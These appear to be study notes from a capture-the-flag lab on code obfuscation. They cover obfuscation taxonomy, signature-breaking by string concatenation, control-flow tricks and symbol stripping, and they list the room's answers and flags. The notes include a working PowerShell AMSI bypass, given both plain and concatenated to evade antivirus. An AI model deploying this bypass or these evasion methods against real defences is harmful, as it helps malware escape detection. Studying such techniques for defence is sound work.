- Origins of Obfuscation
- Obfuscation's Function for Static Evasion
- Object Concatenation
- Obfuscation's Function for Analysis Deception
- Code Flow and Logic
- Arbitrary Control Flow Patterns
- Protecting and Stripping Identifiable Information
-
Obfuscation is generally used to protect IP (Intellectual Property) and proprietary info in an app.
-
This paper covers layered obfuscation and the methods used.
-
Adversaries & malware devs can leverage obfuscation to break signatures or prevent program analysis.
1. How many core layers make up the Layered Obfuscation Taxonomy? - 4
2. What sub-layer of the Layered Obfuscation Taxonomy encompasses meaningless identifiers? - Obfuscating Layout-
Obfuscating data:
- Array transformation
- Data encoding
- Data procedurization
- Data splitting/merging
1. What obfuscation method will break or split an object? - data splitting
2. What obfuscation method is used to rewrite static data with a procedure call? - data procedurization-
Concatenation can be used to break targeted static signatures; attackers can also use it to break up all objects of a program and try to remove all signatures at once.
-
In Yara, for example, if a defined string is present, it will be detected; however if we use concatention in our malware for the string, it will be functionally the same but will appear as multiple independent strings, resulting in no alerts.
-
Non-interpreted characters:
-
Breaks - breaking string into multiple sub-strings
-
Reorders - reorder string components
-
Whitespace - include non-interpreted whitespace
-
Ticks - include non-interpreted ticks
-
Random case - for case-insensitive strings
-
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
#this is blocked by AV software
#so we need to use concatenation and non-interpreted chars
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'i'+'Ut'+'ils')
#we can break it down by cmdlet and check for each cmdlet
#before proceeding
#we need to do separation of related code for final command
$Value="SetValue"
[Ref].Assembly.GetType( 'System.Management.Auto' + 'mation.Amsi' + 'Ut'+ 'ils' ).GetField( 'amsi' + 'In' + 'itFailed','No' +'nPublic,St' + 'atic').$Value($null,$true)
#submit this for flag1. What flag is found after uploading a properly obfuscated snippet? - THM{koNC473n473_4Ll_7H3_7H1n95}-
Adversaries can leverage advanced logic and maths to create complex, tougher to understand code to combat analysis & RE.
-
Obfuscating layout:
- Junk codes
- Separation of related codes
- Stripping redundant symbols
- Meaningless identifiers
-
Obfuscating controls:
- Implicit controls
- Dispatcher-based controls
- Probabilistic control flows
- Bogus control flows
1. What are junk instructions referred to as in junk code? - code stubs
2. What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees? - obfuscating controls- Control flow - critical for program; defines how program will logically proceed.
1. Can logic change and impact the control flow of a program? - T-
Opaque predicates - used to control known output & input; its value is known to the obfuscator but it is difficult to deduce.
-
Opaque predicates fall under 'bogus control flow' and 'probabilistic control flow'.
1. What flag is found after properly reversing the provided snippet? - THM{D3cod3d!!}- Major types of identifiable info are code structure, object names, and file/compilation properties.
#after obfuscating code structure and object names for given program
#we need to compile it
x86_64-w64-mingw32-g++ challenge-8.cpp -o challenge-8.exe
nm challenge-8.exe
#we need to remove symbols from the compiled binary
strip --strip-all challenge-8.exe
nm challenge-8.exe
#this does not show any symbols
#so we can upload it now to get flag1. What flag is found after uploading a properly obfuscated snippet? - THM{Y0Ur_1NF0_15_M1N3}